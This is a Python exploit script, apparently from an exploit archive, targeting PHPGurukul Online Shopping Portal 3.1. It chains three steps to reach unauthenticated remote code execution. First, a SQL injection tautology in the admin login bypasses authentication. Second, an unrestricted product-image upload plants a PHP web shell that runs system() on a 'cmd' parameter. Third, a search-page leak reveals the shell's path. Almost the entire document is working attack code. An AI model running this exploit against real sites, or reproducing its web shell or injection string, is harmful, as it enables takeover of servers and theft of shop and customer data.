# Exploit Title: Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)
# Date: 17.06.2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://phpgurukul.com/shopping-portal-free-download/
# Version: V3.1
# Tested on: Windows & Ubuntu


import random
import string
import sys

import requests


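# Target base URL without trailing slash. The first CLI argument overrides the
# hard-coded default so the PoC does not need editing per target.
url = sys.argv[1].rstrip("/") if len(sys.argv) > 1 else "http://192.168.1.3:80/shopping"
# Minimal PHP web shell: runs ?cmd=<command> through system() and prints the output.
payload = "<?php if(isset($_GET['cmd'])){ echo '<pre>'; $cmd = ($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>"

# One session so the admin cookie obtained below is reused for the upload.
session = requests.session()

print("logining")

# Step 1 - authentication bypass. The admin login form accepts a SQL tautology in
# the username field with an empty password; the resulting cookie lands in `session`.
request_url = url + "/admin/"
post_data = {"username": "' OR 1=1-- a", "password": '', "submit": ''}
resp = session.post(request_url, data=post_data)
resp.raise_for_status()

let = string.ascii_lowercase
# A random product name lets us find our own record in the public search results;
# a random shell name avoids clobbering an existing file in the upload directory.
shellname = ''.join(random.choice(let) for i in range(15))
randstr = ''.join(random.choice(let) for i in range(15))

print("product name is " + randstr)
print("shell name is " + shellname)
print("uploading payload")

# Step 2 - unrestricted file upload. insert-product.php stores the product images
# under the client-supplied filename, so a .php file is written to
# admin/productimages/. Let requests build the multipart body and boundary; the
# hand-assembled body it replaces mixed unescaped quotes into a Python string and
# lacked CRLF separators, so it was not valid code.
request_url = url + "/admin/insert-product.php"
post_header = {"Referer": request_url}
post_fields = [
    ("category", "80"),
    ("subcategory", "8080"),
    ("productName", randstr),
    ("productCompany", "Tagoletta"),
    ("productpricebd", "Tagoletta"),
    ("productprice", "Tagoletta"),
    ("productDescription", "Tagoletta"),
    ("productShippingcharge", "Tagoletta"),
    ("productAvailability", "In Stock"),
    ("submit", ""),
]
# The same payload is sent for all three image slots, as in the original request.
post_files = [
    (field, (shellname + ".php", payload, "application/octet-stream"))
    for field in ("productimage1", "productimage2", "productimage3")
]
resp = session.post(request_url, headers=post_header, data=post_fields, files=post_files)
resp.raise_for_status()

# Step 3 - path disclosure. The unauthenticated search page embeds the stored image
# path as data-echo="admin/productimages<subpath><file>", so searching for the random
# product name reveals where the shell was written.
request_url = url + "/search-result.php"
post_data = {"product": randstr, "search": ''}
resp = session.post(request_url, data=post_data)
resp.raise_for_status()
marker = 'data-echo="admin/productimages'
body = resp.text
# Fail with a clear message instead of an IndexError when the upload did not land.
if marker not in body or (shellname + ".php") not in body:
    sys.exit("uploaded file not found in search results - exploit failed")
shellpath = body.split(marker)[1].split(shellname + ".php")[0]

print(" path of shell= " + url + "/admin/productimages" + shellpath + shellname + ".php")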